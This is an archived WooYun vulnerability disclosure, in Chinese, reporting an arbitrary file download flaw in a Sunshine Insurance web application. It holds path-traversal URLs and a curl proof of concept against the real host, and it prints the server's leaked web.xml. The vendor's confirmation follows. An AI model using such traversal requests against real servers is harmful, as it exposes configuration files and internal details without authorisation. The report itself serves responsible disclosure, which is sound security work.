当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142395

漏洞标题:阳光保险任意文件下载漏洞一枚

相关厂商:阳光保险集团

漏洞作者: 逆流冰河

提交时间:2015-09-21 12:50

修复时间:2015-11-05 14:24

公开时间:2015-11-05 14:24

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-21: 细节已通知厂商并且等待厂商处理中
2015-09-21: 厂商已经确认,细节仅向厂商公开
2015-10-01: 细节向核心白帽子及相关领域专家公开
2015-10-11: 细节向普通白帽子公开
2015-10-21: 细节向实习白帽子公开
2015-11-05: 细节向公众公开

简要描述:

1,此漏洞也是意外发现的,主要不是想搞这个漏洞的

详细说明:

1,web.xml
http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../web.xml
2,log4j.xml
http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../classes/log4j.xml

漏洞证明:

curl -vv 'http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../web.xml'
* Hostname was NOT found in DNS cache
*   Trying 111.203.203.13...
* Connected to kybpc.chexian.sinosig.com (111.203.203.13) port 80 (#0)
> GET /easyInsurance/html5/downLoad.do?fileName=../web.xml HTTP/1.1
> User-Agent: curl/7.37.1
> Host: kybpc.chexian.sinosig.com
> Accept: */*
> 
< HTTP/1.1 200 OK
* Server Apache-Coyote/1.1 is not blacklisted
< Server: Apache-Coyote/1.1
< X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
< Content-Disposition: attachment;filename=../web.xml
< Content-Type: application/xml;charset=UTF-8
< Content-Language: zh-CN
< Transfer-Encoding: chunked
< Date: Mon, 21 Sep 2015 04:49:24 GMT
< 
<?xml version="1.0" encoding="utf-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	version="2.4"
	xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
	<!-- Spring ApplicationContext配置文件的路径?,可使用通配符,多个路径用?1,
	号分隔 此参数用于后面的Spring-Context loader -->
	<context-param>
		<param-name>contextConfigLocation</param-name>
		<param-value>
			classpath*:spring/*.xml
		</param-value>
	</context-param>
	<context-param>
		<param-name>javax.servlet.jsp.jstl.fmt.localizationContext</param-name>
		<param-value>i18n/messages</param-value>
	</context-param>
	<context-param>
		<param-name>log4jConfigLocation</param-name>
		<param-value>/WEB-INF/classes/log4j.xml</param-value>
	</context-param>
	<context-param>
		<param-name>log4jRefreshInterval</param-name>
		<param-value>5</param-value>
	</context-param>
	<!-- 服务器缓存类型 -->
	<context-param>
		<param-name>cacheType</param-name>
		<param-value>ehcache</param-value>
	</context-param>
	<!-- 著名 Character Encoding filter -->
	<filter>
		<filter-name>encodingFilter</filter-name>
		<filter-class>org.springframework.web.filter.CharacterEncodingFilter</filter-class>
		<init-param>
			<param-name>encoding</param-name>
			<param-value>UTF-8</param-value>
		</init-param>
	</filter>
	<!-- 页面元素的GZIP压缩 Filter -->
	<filter>
		<filter-name>compressFilter</filter-name>
		<filter-class>ins.framework.web.CompressFilter</filter-class>
		<init-param>
			<param-name>ignoreKey</param-name>
			<param-value>.js,.css,.gif,.jpg,.vbs</param-value>
		</init-param>
	</filter>
	<filter>
		<filter-name>struts2</filter-name>
		<filter-class>
			org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter
		</filter-class>
	</filter>
	<filter>
		<filter-name>SessionFilter</filter-name>
		<filter-class>com.sinosoft.easyInsurance.common.web.SessionFilter</filter-class>
	</filter>
	
	<filter>
		<filter-name>MenuDisabledFilter</filter-name>
		<filter-class>com.sinosoft.easyInsurance.common.web.MenuDisabledFilter</filter-class>
	</filter>
	<!-- Cache Filter 缓存过滤器 -->
	<filter>
		<filter-name>CacheFilter</filter-name>
		<filter-class>ins.framework.web.CacheFilter</filter-class>
		<init-param>
			<param-name>expireTime</param-name>
			<param-value>300</param-value>
		</init-param>
	</filter>
	<filter-mapping>
		<filter-name>CacheFilter</filter-name>
		<url-pattern>*.js</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>CacheFilter</filter-name>
		<url-pattern>*.css</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>CacheFilter</filter-name>
		<url-pattern>*.gif</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>CacheFilter</filter-name>
		<url-pattern>*.jpg</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>CacheFilter</filter-name>
		<url-pattern>*.vbs</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>CacheFilter</filter-name>
		<url-pattern>*.html</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>encodingFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>encodingFilter</filter-name>
		<url-pattern>*.do</url-pattern>
	</filter-mapping>
	<!-- 页面元素的GZIP压缩 Filter,减少网络带宽 -->
	<filter-mapping>
		<filter-name>compressFilter</filter-name>
		<url-pattern>*.js</url-pattern>
	</filter-mapping>
	
	<filter-mapping>
		<filter-name>MenuDisabledFilter</filter-name>
		<url-pattern>*.do</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>struts2</filter-name>
		<url-pattern>*.do</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>struts2</filter-name>
		<url-pattern>*.jsp</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
		<dispatcher>INCLUDE</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>struts2</filter-name>
		<url-pattern>/struts/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>SessionFilter</filter-name>
		<url-pattern>*.do</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>SessionFilter</filter-name>
		<url-pattern>*.jsp</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>SessionFilter</filter-name>
		<url-pattern>/*Servlet</url-pattern>
	</filter-mapping>
	<!-- 日志 -->
	<listener>
		<listener-class>org.springframework.web.util.Log4jConfigListener</listener-class>
	</listener>
	<!-- Session Log Listener 载入 <listener> <listener-class> ins.common.web.ClaimHttpSessionListener 
		</listener-class> </listener> -->
	<!--Spring ApplicationContext 载入 -->
	<listener>
		<listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
	</listener>
	<listener>
		<listener-class>org.springframework.web.context.request.RequestContextListener</listener-class>
	</listener>
	<!-- Spring 刷新Introspector防止内存泄露 -->
	<listener>
		<listener-class>
			org.springframework.web.util.IntrospectorCleanupListener
		</listener-class>
	</listener>
	<!-- cacheManager 服务端缓存 -->
	<listener>
		<listener-class>ins.framework.cache.CacheManagerInitListener</listener-class>
	</listener>
	<!-- requestCombo 合并组件 -->
	<servlet>
		<servlet-name>RequestComboServlet</servlet-name>
		<servlet-class>ins.platform.requestcombo.RequestComboServlet</servlet-class>
		<init-param>
			<description>允许访问的URL前缀,避免源码泄漏风险</description>
			<param-name>validPrefix</param-name>
			<param-value>/widgets/</param-value>
		</init-param>
		<init-param>
			<description>是否开启服务端对js文件混淆压缩</description>
			<param-name>isCompress</param-name>
			<param-value>false</param-value>
		</init-param>
	</servlet>
	<servlet-mapping>
		<servlet-name>RequestComboServlet</servlet-name>
		<url-pattern>/requestCombo</url-pattern>
	</servlet-mapping>
	<filter-mapping>
		<filter-name>CacheFilter</filter-name>
		<url-pattern>/requestCombo</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>compressFilter</filter-name>
		<url-pattern>/requestCombo</url-pattern>
	</filter-mapping>
<!-- 
	<servlet>
		<display-name>Apache-Axis Servlet</display-name>
		<servlet-name>AxisServlet</servlet-name>
		<servlet-class>org.apache.axis.transport.http.AxisServlet</servlet-class>
	</servlet>
	<servlet>
		<display-name>Axis Admin Servlet</display-name>
		<servlet-name>AdminServlet</servlet-name>
		<servlet-class>org.apache.axis.transport.http.AdminServlet</servlet-class>
		<load-on-startup>100</load-on-startup>
	</servlet>
 -->
	<servlet>
		<servlet-name>serviceFactoryInitServlet</servlet-name>
		<servlet-class>
			com.sinosoft.easyInsurance.common.web.ServiceFactoryInitServlet
		</servlet-class>
		<load-on-startup>3</load-on-startup>
	</servlet>
<!-- 
	<servlet-mapping>
		<servlet-name>AxisServlet</servlet-name>
		<url-pattern>/servlet/AxisServlet</url-pattern>
	</servlet-mapping>
	<servlet-mapping>
		<servlet-name>AxisServlet</servlet-name>
		<url-pattern>*.jws</url-pattern>
	</servlet-mapping>
	<servlet-mapping>
		<servlet-name>AxisServlet</servlet-name>
		<url-pattern>/services/*</url-pattern>
	</servlet-mapping>
	<servlet-mapping>
		<servlet-name>AdminServlet</servlet-name>
		<url-pattern>/servlet/AdminServlet</url-pattern>
	</servlet-mapping>
 -->
	<!-- session超时定义,单位为分钟 -->
	<session-config>
		<session-timeout>60</session-timeout>
	</session-config>
	<mime-mapping>
		<extension>js</extension>
		<mime-type>text/javascript;charset=utf-8</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>htm</extension>   
		<mime-type>text/html;charset=utf-8</mime-type>
	</mime-mapping>
	<servlet>
		<servlet-name>allocatePushServlet</servlet-name>
		<servlet-class>
			com.sinosoft.easyInsurance.common.web.ProxyServlet
		</servlet-class>
<!-- 		<load-on-startup>3</load-on-startup> -->
	</servlet>
	<servlet-mapping>
		<servlet-name>allocatePushServlet</servlet-name>
		<url-pattern>/allocatePushServlet</url-pattern>
	</servlet-mapping>
</web-app>

修复方案:

我就不再深入了

版权声明:转载请注明来源 逆流冰河@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-09-21 14:23

厂商回复:

感谢提交

最新状态:

暂无